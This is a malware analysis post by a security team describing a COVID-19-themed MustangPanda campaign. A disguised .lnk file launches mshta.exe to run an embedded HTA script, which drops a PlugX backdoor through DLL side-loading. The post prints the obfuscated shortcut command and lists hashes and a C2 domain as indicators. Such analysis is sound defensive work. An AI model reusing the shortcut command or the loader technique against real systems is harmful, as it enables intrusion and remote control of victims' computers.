[email protected] (04) 3795 8282 - (04) 3795 8228 - 1800 556 864
MustangPanda – COVID 19 Malware
.07 Mar

MustangPanda - COVID 19 Malware

I / Introduction

Recently, due to the complicated development of COVID 19, many hacker groups took advantage of this to conduct APT campaigns aimed at organizations around the world, as well as appear campaigns in Vietnam.

Recently taking advantage of the stressful situation of the COVID-19 influenza, the malicious code similar to those developed by the Panda hacker group was found to impersonate three government notices about the outbreak. to deceive users. The malware was injected in a word file with the title: "Chi Thi thuong nguyen xuuc phuc" to deceive users, this code is currently collected by us through the CMC Threat Intelligence system.

Through this malicious pattern Threat Intelligence system is involved with some of the recent samples that we have warnings about.




II / Detail


The sample file is a shortcut file with the extension ".lnk" hidden as a winword file to deceive users because the ".lnk" extension will be hidden by Windows. However, this winword file uses a suspicious target. Normally the shortcut target target usually points to a destination folder or file, but the target of this template contains the command with the form:

%comspec% / c for %x in (%temp% = %) do for / f "delims ==" %i in ('dir "%x \ Chi Thi thuong nguyen xuan phuc.lnk" / s / b'wind) start m%wind -1,1%hta.exe "%i"

The above code was obfuscate using the variable %comspec% instead of directly calling the string "cmd.exe" and the "s" in the file name mshta.exe was obtained by cutting the last character in the variable "%windir%" (usually C: \ Windows). Mshta.exe is a microsoft application developed to take advantage of fast application building through html, css, vbscript, javascript. Using mshta and the .hta file format, you can open an html page as an application. The hta file format is the same as the html file. By adding a tag inside the html file we have the hta file that can be opened via the mshta application.

However, the hta file may be inserted before its header. Taking advantage of this, the attacker pre-inserted an lnk file with the command to open itself with mshta.exe to execute the embedded .hta file. When the user opens the lnk file, will execute the command in the target of the lnk file and execute the msha.exe file to open itself.


By default, mshta.exe can execute both javascript and vbscript embedded in hta files using related dlls. The hta file that is embedded when opened will have the following properties: minimize, not shown on the taskbar, no menu and caption. Its sole task is to execute malicious vbscript code.

When vbscipt is executed, this script decodes and stores into %TEMP% folder 3 binary files in base64 and 1 document file.

The document file is then opened for the user.

When this attack uses PLUGX RAT will be executed:

3.exe file is actually a clean file, but when executed it will load up a malicious dll file

To do this, the attacker only needs to find a dll loaded by the LoadLibrary function in the 3.exe file (in this case http_dll.dll), then create a malicious dll file with the same name as the parameter of the LoadLibrary function. and put it in the same directory as the 3.exe file. When calling LoadLibrary, 3.exe will find the dll in the same directory first and load it up.

When "http_dll.dll" is loaded, it will redirect the execution of the PE file to a function in the DLL by changing the memory property on the memory of the PE file via the VirtualProtect API and replacing the code with a pair of push commands. , ret.

At the function of malicious DLL will read file http_dll.dat in the same directory. The content at the beginning of this dat file is a string with null-terminated and data. This string will be used to be the decryption key for the data portion of the dat file.

After that, the malicious code will create a new memory area to contain the decryption process conducted by the xor algorithm with the string key in the dat file as above. The malware continues to change the properties of this new device with the PAGE_EXECUTE_READWRITE property and execute shellcode at this address.

The decoded content is a RAW PE file, but it has been cleverly integrated into a shellcode, starting from offset 0. This shellcode serves as a loader, load this raw PE file to be able to execute OK.

First, shellcode finds the address of kernel32.dll and then fetches the functions LoadLibray, GetProcAddress, ZwFlushIntructionCache, VirtualAlloc by comparing the hash of the names of the functions that are exported by kernel32.

Then, Loader reads the header of the PE file, maps the sections to the corresponding memory areas, reallocates some addresses and resolves the Import Address Table of the file. Once completed, the program execution flow will be passed to the DllMain function of this PE file.

Final Payload

Here, the malicious code will take a number of paths to use, then decrypt a data section to use.

The decoding result is a number of strings including autorun key name, ip c & c server. The malicious code then proceeds:

  • Make a copy of the three executable files to the user's profile directory or alluserprofile if there are sufficient administrator rights.
  • Add and lock autorun to activate the executable file which has just been dropped when restarting the computer. Also relaunch itself if this is its first run. The malware distinguishes this by inserting another parameter to it at subsequent runs.
  • Create a mutex, connect to the server to receive commands from the server.
  • Creating a backdoor allows an attacker to execute commands remotely.
  • Support many different commands including upload file, folder, list folder, read file, get computer information, user, ...

3. Conclusion

By using various attack and disruptive techniques during execution, it is shown that the person behind the malware development has invested a lot of time in researching the target and developing the attack method accordingly. . APT is a malicious attack, carefully invested to steal important information and cause damage to the organization. To prevent APT attacks, always prepare new precautions and ongoing monitoring to ensure the security of users and organizations as well.


SHA256: BBBEB1A937274825B0434414FA2D9EC629BA846B1E3E33A59C613B54D375E4D2

MD5: 60C89B54029442C5E131F01FF08F84C9

SHA1: 52873A2C81B1F462CDDF3C86B2103F74EF56F91E

C: \ Users \ admin \ AppData \ Local \ Temp \ 3.exe:


C: \ Users \ admin \ AppData \ Local \ Temp \ http_dll.dll:



DOMAIN vietnam.zing.photos


By ManhChich - UraSec Team - CMC SOC Center

Write a post